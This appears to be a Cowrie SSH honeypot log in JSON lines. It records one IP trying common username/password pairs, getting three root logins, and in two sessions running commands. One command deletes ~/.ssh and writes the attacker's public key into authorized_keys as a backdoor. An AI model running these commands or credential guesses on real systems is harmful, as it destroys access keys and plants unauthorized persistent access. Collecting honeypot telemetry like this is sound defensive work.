{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:34:29.890233Z","src_ip":"212.227.235.229","session":"3b7f51f8a3a0"}
{"eventid":"cowrie.login.failed","username":"tests","password":"tests123","message":"login attempt [tests/tests123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:34:30.824443Z","src_ip":"212.227.235.229","session":"3b7f51f8a3a0"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:34:32.051373Z","src_ip":"212.227.235.229","session":"3b7f51f8a3a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49344,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0e15191ba3d","protocol":"ssh","message":"New connection: 212.227.235.229:49344 (1.2.3.4:22) [session: b0e15191ba3d]","sensor":"my-vps","timestamp":"2025-09-09T01:34:36.321486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:34:36.322590Z","src_ip":"212.227.235.229","session":"b0e15191ba3d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:34:36.579646Z","src_ip":"212.227.235.229","session":"b0e15191ba3d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Password1","message":"login attempt [postgres/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T01:34:37.649778Z","src_ip":"212.227.235.229","session":"b0e15191ba3d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:34:38.909414Z","src_ip":"212.227.235.229","session":"b0e15191ba3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37694,"dst_ip":"1.2.3.4","dst_port":22,"session":"614c51a43087","protocol":"ssh","message":"New connection: 212.227.235.229:37694 (1.2.3.4:22) [session: 614c51a43087]","sensor":"my-vps","timestamp":"2025-09-09T01:34:51.225334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:34:51.226075Z","src_ip":"212.227.235.229","session":"614c51a43087"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:34:51.345711Z","src_ip":"212.227.235.229","session":"614c51a43087"}
{"eventid":"cowrie.login.failed","username":"z","password":"1234567","message":"login attempt [z/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T01:34:51.864134Z","src_ip":"212.227.235.229","session":"614c51a43087"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:34:52.986443Z","src_ip":"212.227.235.229","session":"614c51a43087"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53214,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd8305e21b0c","protocol":"ssh","message":"New connection: 212.227.235.229:53214 (1.2.3.4:22) [session: fd8305e21b0c]","sensor":"my-vps","timestamp":"2025-09-09T01:34:57.876489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:34:57.878342Z","src_ip":"212.227.235.229","session":"fd8305e21b0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:34:58.110722Z","src_ip":"212.227.235.229","session":"fd8305e21b0c"}
{"eventid":"cowrie.login.failed","username":"ahmad","password":"12345678","message":"login attempt [ahmad/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:34:59.046947Z","src_ip":"212.227.235.229","session":"fd8305e21b0c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:00.282247Z","src_ip":"212.227.235.229","session":"fd8305e21b0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54710,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef4aa521866f","protocol":"ssh","message":"New connection: 212.227.235.229:54710 (1.2.3.4:22) [session: ef4aa521866f]","sensor":"my-vps","timestamp":"2025-09-09T01:35:03.869787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:03.870947Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:04.139642Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.login.success","username":"root","password":"fabregas","message":"login attempt [root/fabregas] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:35:05.260241Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:35:05.817589Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:35:05.818364Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:35:05.819755Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:06.090198Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:35:06.748086Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:35:06.749296Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:35:07.021819Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:07.023166Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54726,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb4f05d92538","protocol":"ssh","message":"New connection: 212.227.235.229:54726 (1.2.3.4:22) [session: bb4f05d92538]","sensor":"my-vps","timestamp":"2025-09-09T01:35:07.282742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:07.283870Z","src_ip":"212.227.235.229","session":"bb4f05d92538"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:07.545829Z","src_ip":"212.227.235.229","session":"bb4f05d92538"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:35:08.632913Z","src_ip":"212.227.235.229","session":"bb4f05d92538"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:09.896766Z","src_ip":"212.227.235.229","session":"bb4f05d92538"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54734,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6431c09e183","protocol":"ssh","message":"New connection: 212.227.235.229:54734 (1.2.3.4:22) [session: e6431c09e183]","sensor":"my-vps","timestamp":"2025-09-09T01:35:10.157516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:10.158242Z","src_ip":"212.227.235.229","session":"e6431c09e183"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:10.419355Z","src_ip":"212.227.235.229","session":"e6431c09e183"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:35:11.506971Z","src_ip":"212.227.235.229","session":"e6431c09e183"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:11.769931Z","src_ip":"212.227.235.229","session":"ef4aa521866f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:11.771079Z","src_ip":"212.227.235.229","session":"e6431c09e183"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37696,"dst_ip":"1.2.3.4","dst_port":22,"session":"22837e5ab8bc","protocol":"ssh","message":"New connection: 212.227.235.229:37696 (1.2.3.4:22) [session: 22837e5ab8bc]","sensor":"my-vps","timestamp":"2025-09-09T01:35:14.666818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:14.667687Z","src_ip":"212.227.235.229","session":"22837e5ab8bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:14.976717Z","src_ip":"212.227.235.229","session":"22837e5ab8bc"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"12345678","message":"login attempt [anonymous/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:35:16.255115Z","src_ip":"212.227.235.229","session":"22837e5ab8bc"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:35:17.566360Z","src_ip":"212.227.235.229","session":"22837e5ab8bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52630,"dst_ip":"1.2.3.4","dst_port":22,"session":"31ab24299c23","protocol":"ssh","message":"New connection: 212.227.235.229:52630 (1.2.3.4:22) [session: 31ab24299c23]","sensor":"my-vps","timestamp":"2025-09-09T01:35:24.679983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:35:24.680997Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:35:24.789538Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@1","message":"login attempt [root/huawei@1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:35:25.264877Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:35:25.540411Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:35:25.541064Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:35:25.541935Z","src_ip":"212.227.235.229","session":"31ab24299c23"}
